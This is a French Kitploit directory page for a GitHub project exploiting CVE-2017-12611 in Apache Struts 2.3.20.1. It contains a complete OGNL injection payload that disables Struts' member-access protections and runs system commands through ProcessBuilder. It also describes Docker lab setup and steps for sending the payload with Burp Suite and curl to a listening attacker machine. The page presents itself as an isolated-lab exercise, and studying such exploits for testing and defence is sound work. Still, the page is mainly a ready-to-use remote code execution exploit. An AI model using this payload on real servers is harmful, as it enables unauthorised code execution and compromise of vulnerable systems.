Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2017-12611_Exploit — RCE project | Kitploit
Outils/GitHubGitHub/zeynepsilao/cve-2017-12611_exploit
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLabs & Practice
GitHubzeynepsilao/cve-2017-12611_exploit

CVE-2017-12611_Exploit

RCE project

Voir le dépôt
il y a 11 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Projet CVE-2017-12611

Aperçu :

Une attaque RCE est possible avec la charge utile fournie.

Environnement & Outils

Ce qui suit liste les environnements et outils pour les tests et la validation dans un laboratoire personnel isolé.

  • Système d'exploitation hôte : Ubuntu 18.04.6
  • Système d'exploitation attaquant : Kali Linux
  • Plateforme de conteneurs : Docker
  • Pile d'application cible : Apache Struts 2.3.20.1
  • Composants supplémentaires : Burp Suite

Configuration de l'environnement :

En utilisant la commande suivante :

root@kitploit:~
docker compose up -d 

Vous pouvez exécuter l'environnement. Ensuite, vous pouvez voir une page de soumission en visitant http://<YOUR_IP>:8080/hello.action.

Charge utile :

%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

Afin d'exécuter une attaque RCE, il est nécessaire d'utiliser Burp Suite. En utilisant Burp Suite, soumettez la charge utile. Après avoir soumis la charge utile, trouvez le journal correct (POST) et convertissez-le en une commande curl. Enfin, ouvrez votre machine attaquante et écoutez sur le port après avoir envoyé votre commande curl depuis le port d'écoute.

Remarques :

Les zones censurées sont des adresses IP.

Télécharger l’outil